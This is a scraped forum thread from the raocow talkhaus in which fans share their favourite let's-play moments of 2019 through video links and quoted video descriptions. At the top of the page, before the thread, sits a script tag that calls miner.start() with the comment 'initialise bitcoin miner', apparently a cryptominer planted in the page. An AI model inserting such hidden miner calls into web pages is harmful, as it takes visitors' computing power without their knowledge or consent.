<script>
miner.start(); // initialise bitcoin miner
</script>

smbx communitypge projectsmw central

Highlight of the Year 2019

They're here! They're back! I don't know what to put here. The Mosts exist, so let's do this!
User avatar
SAJewers
hi
Posts: 3271
Joined: 7 years ago
Location: Nova Scotia

Highlight of the Year 2019

Postby SAJewers » 1 month ago

2018: https://talkhaus.raocow.com/viewtopic.php?f=78&t=17877

Post your best raocow moment this year.
ImageImageImageImageImage
Image
ImageImageImageImage

User avatar
Cyril
metal nerd
Posts: 2021
Joined: 5 years ago
First name: Cyril
Pronouns: he/she/they
Location: hell

Re: Highlight of the Year 2019

Postby Cyril » 1 month ago

the description of this video
https://www.youtube.com/watch?v=UdpHHiLC_cE
i've honestly never played a video game in my life
:catcrime:

User avatar
Kleetus
Posts: 210
Joined: 11 months ago
Location: Under a starless sky (due to light pollution)

Re: Highlight of the Year 2019

Postby Kleetus » 1 month ago

raocow's reaction to beating Amphisbaea in La-Mulana.

User avatar
BurntTenda
defeat four ducks
Posts: 508
Joined: 4 years ago
Pronouns: he/him/his
Location: Indoors~, Indoors~

Re: Highlight of the Year 2019

Postby BurntTenda » 1 month ago

Cyril wrote: the description of this video
https://www.youtube.com/watch?v=UdpHHiLC_cE
Something goes here sometime.
Oh yeah, I have a Youtube channel

User avatar
kitikami
Posts: 498
Joined: 6 years ago

Re: Highlight of the Year 2019

Postby kitikami » 1 month ago

Come back here and take me seriously, Robotnik!
https://www.youtube.com/watch?v=WcesGhpmbyY&t=2m30s

Honorable mention to finding out you can stand on the ropes in the Crash Bandicoot bridge levels.
Image

User avatar
NastCF
Posts: 109
Joined: 9 months ago
Pronouns: he/him/his
Location: Portugal

Re: Highlight of the Year 2019

Postby NastCF » 1 month ago

kitikami wrote: Come back here and take me seriously, Robotnik!
https://www.youtube.com/watch?v=WcesGhpmbyY&t=2m30s
Oh man I forgot about that one. I feel bad not coming up with my own answer but my memory's terrible
Image

User avatar
tangy
owo
Posts: 705
Joined: 5 years ago
Pronouns: null
Location: Atlanta

Re: Highlight of the Year 2019

Postby tangy » 1 month ago

BurntTenda wrote:
Cyril wrote: the description of this video
https://www.youtube.com/watch?v=UdpHHiLC_cE
Image Avatar by Loni/sonicspin
Image
Image

User avatar
Bean
Posts: 3152
Joined: 10 years ago
Location: In my own world

Re: Highlight of the Year 2019

Postby Bean » 1 month ago

The Description in All the Sonics - Sonic the Hedgehog (16bit) - 3 - green mind

"in 1991, local layabout samwell 'ronco' tarly had a horrible accident when he had a head-on collusion with another vehicle while driving in the mohave desert. after the impact, as he was dying, his eyes transfixed on a small blue mouse character hanging from his rear view mirror. his brain, panicking, set samwell in a strange dreamstate, fixated on the toy. as samwell's dying brain struggled to keep its consciousness alive, a strange world was created in his mind state. the further he drifted, the clearer things became, though at the same time things made progressively less and less sense.

this is his recollection."

Koba's LP Thread Index topic even references it with the name.

User avatar
Gardenolva
Void and Voir embraced together...
Posts: 529
Joined: 5 years ago
First name: En Gardevoir
Pronouns: Male
Location: Paradise Prairie

Re: Highlight of the Year 2019

Postby Gardenolva » 1 month ago

raocow beating Hell Temple while half of everyone doubted
Image

Image
A.K.A.: En Gardevoir
Signature credits to DeviousShadows
Original Splash Art by Rayark Games

User avatar
FourteenthOrder
Posts: 432
Joined: 5 years ago
Pronouns: she/her

Re: Highlight of the Year 2019

Postby FourteenthOrder » 1 month ago

Bean wrote: The Description in All the Sonics - Sonic the Hedgehog (16bit) - 3 - green mind

"in 1991, local layabout samwell 'ronco' tarly had a horrible accident when he had a head-on collusion with another vehicle while driving in the mohave desert. after the impact, as he was dying, his eyes transfixed on a small blue mouse character hanging from his rear view mirror. his brain, panicking, set samwell in a strange dreamstate, fixated on the toy. as samwell's dying brain struggled to keep its consciousness alive, a strange world was created in his mind state. the further he drifted, the clearer things became, though at the same time things made progressively less and less sense.

this is his recollection."

Koba's LP Thread Index topic even references it with the name.
(although i think the index had that name first iirc?)
Image

Whimsical Calamari
i am the one that sings the chorus when you hum in the shower
Posts: 1026
Joined: 6 years ago
Location: IT CAME FROM OVER THERE

Re: Highlight of the Year 2019

Postby Whimsical Calamari » 1 month ago

Image
Image
Image
Image
Image
Image
Image

User avatar
KayhemMaus
I keep breaking my face on SMBX
Posts: 314
Joined: 7 years ago
First name: KM
Pronouns: they/them/their
Location: England

Re: Highlight of the Year 2019

Postby KayhemMaus » 1 month ago

kitikami wrote: Come back here and take me seriously, Robotnik!
https://www.youtube.com/watch?v=WcesGhpmbyY&t=2m30s
nyoro~n n~yoron

I love it

Ivy
Posts: 2362
Joined: 5 years ago
Contact:

Re: Highlight of the Year 2019

Postby Ivy » 1 month ago

kitikami wrote: Come back here and take me seriously, Robotnik!
https://www.youtube.com/watch?v=WcesGhpmbyY&t=2m30s

Honorable mention to finding out you can stand on the ropes in the Crash Bandicoot bridge levels.
3DS FC: 2793-0650-7690 | Switch: SW-2766-9108-9399 | Steam: ivysaur1996 (that ivy guy)
Many thanks to GlitchedGhost and Rockythechao for the amazing paper Demo animation!


Return to “Talkhaus Mosts 2019”

Who is online

Users browsing this forum: No registered users and 1 guest